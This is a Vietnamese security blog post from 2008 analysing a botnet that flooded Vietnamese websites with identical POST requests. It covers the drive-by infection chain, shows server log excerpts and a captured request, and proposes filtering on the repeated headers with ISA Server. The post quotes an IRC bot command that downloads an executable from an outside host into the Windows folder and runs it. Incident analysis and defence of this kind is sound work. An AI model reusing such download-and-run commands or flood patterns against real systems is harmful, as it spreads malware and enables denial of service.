Tìm hiểu về mạng botnet

http://vietnamsecurity.googlepages.com

Vậy là vụ việc tấn công một số website ở Việt Nam đã tìm ra kẻ tấn công! tuy nhiên một câu hỏi được đặt ra là các trang web đó có còn bị tấn công nữa hay là không ??? Một sự thật đáng buồn là một số website vẫn tiếp tục bị tấn công! Chính vì vậy hôm nay nhóm vietnamsecurity sẽ tiếp tục viết bài phân tích về cơ chế hoạt động của file tấn công botnet trong thời gian qua! và một số cách phòng chống! 

--------------------------------------------------------------------------- Đầu tiên, chung tìm hiểu cách mà file botnet này hoạt động!

    Sau khi victim truy cập vào website dính mã độc, 1 file sẽ tự động down về máy, thực thi, tạo ra một kết nối giữa máy victim và server kiểm soát, tự động nhận lệnh từ file server.php

    Sau khi nhận lệnh, máy sẽ tự động kết nối vào mạng mIRC và từ đây kẻ tấn công sẽ tiếp tục sử dụng lệnh: !lly.. download http://www.llyk..net/bkav.exe c:\windows\s.exe 1

    Download 1 File tấn công khác về máy victim và thực thi, File thứ nhất chỉ đóng vai trò control. File thứ 2 sẽ là file chứa thông tin website cần DDOS. Vì vậy cho dù, kẻ tấn công đã bị bắt hay dừng kết nối thì máy của victim vẫn tiếp tục tấn công vào các website đã từng nhận lệnh! Đó là nguyên nhân vì sao kẻ tấn công được thông tin là đã bị bắt nhưng một số website thông tin với tôi là vẫn bị tấn công kiểu botnet!

    Như bài viết hôm trước đã phân tích, nội dung File thứ 2 sẽ giống như File bkav.exe đã công bố, tôi kiểm tra file đó và một mẫu file khác vừa nhận được thì phát hiện ra cơ chế của file này là sẽ tự động gửi các gói tin sử dụng method "POST" đến website cần DDOS từ máy victim! Log của website bị tấn công sẽ có dạng như sau:

2008-10-07 11:14:25 W3SVC1 10.xxx GET /forum/showthread.php t=22714 1468 - 123.xxx Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1) 200 0 64
2008-10-07 11:14:25 W3SVC1 10.xxx GET /images/banner/1.jpg - 1468 - 123.xxx Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1) 200 0 0
008-10-07 11:14:32 W3SVC1 10.xxxPOST /forum/index.php - 1468 - 222.xxx:80 xxx.vn 200 0 64
2008-10-07 11:14:32 W3SVC1
10.xxx POST /forum/index.php - 1468 - 222.xxx:80 xxx.vn 200 0 64
2008-10-07 11:14:32 W3SVC1
10.xxx POST /forum/index.php - 1468 - 222.xxx:80 xxx.vn 200 0 64
2008-10-07 11:14:32 W3SVC1
10.xxx POST /forum/index.php - 1468 - 222.xxx:80 xxx.vn 200 0 64
2008-10-07 11:14:32 W3SVC1
10.xxx POST /forum/index.php - 1468 - 222.xxx:80 xxx.vn 200 0 64
2008-10-07 11:14:33 W3SVC1
10.xxx POST /forum/index.php - 1468 - 222.xxx:80 xxx.vn 200 0 64
2008-10-07 11:14:33 W3SVC1 10.xxx GET /index.php - 1468 - 222.xxx Mozilla/4.0+(ISA+Server+Connectivity+Check) 200 0 0

Nội dung của 1 gói tin gửi từ máy victim có dạng như sau :

 

 

"POST /forum//index.php HTTP/1.1

Host: xxx.vn 

User-Agent: Lly... 

Connection: close

Referer: http://google.com

Content-Type: application/x-www-form-urlencoded

Content-Length: 0 

Authorization: Basic QG11dmlldDpAbXV2aWV0 

HTTP/1.1 400 Bad Request

Connection: close

Content-Length: 39

Date: Sat, 11 Oct 2008 14:10:13 GMT

Content-Type: text/html

<h1>Bad Request (Invalid Hostname)</h1>

     Vậy là đã rõ, máy sẽ gửi các gói tin giống nhau liên tục đến website cần tấn công gây ra việc tốn tài nguyên của server. Tuy nhiên chính vì đặt điểm các gói tin này là giống nhau, nên cách tốt nhất để ngăn chặn việc DDOS này là lọc bỏ các gói tin có những phần header giống nhau như:

Host: xxx.vn

User-Agent: Lly...

Authorization: Basic QG11dmlldDpAbXV2aWV0

    Phương pháp thì có nhiều cách tuy nhiên ở đây tôi xin trình bày một vài hình ảnh sử dụng ISA trên windows!

 

Trên đây là một hướng dẫn nhỏ để chống lại file botnet tấn công website! chúng tôi sẽ tiếp tục cập nhật và bổ sung! mong nhận được sự bổ sung từ các bạn!

hackerbinhphuoc - vietnamsecurity.googlepages.com - vnsecurity.info
Bài này chỉ phân tích tình huống trong Vụ BOTNET tấn công BKAV, 5giây...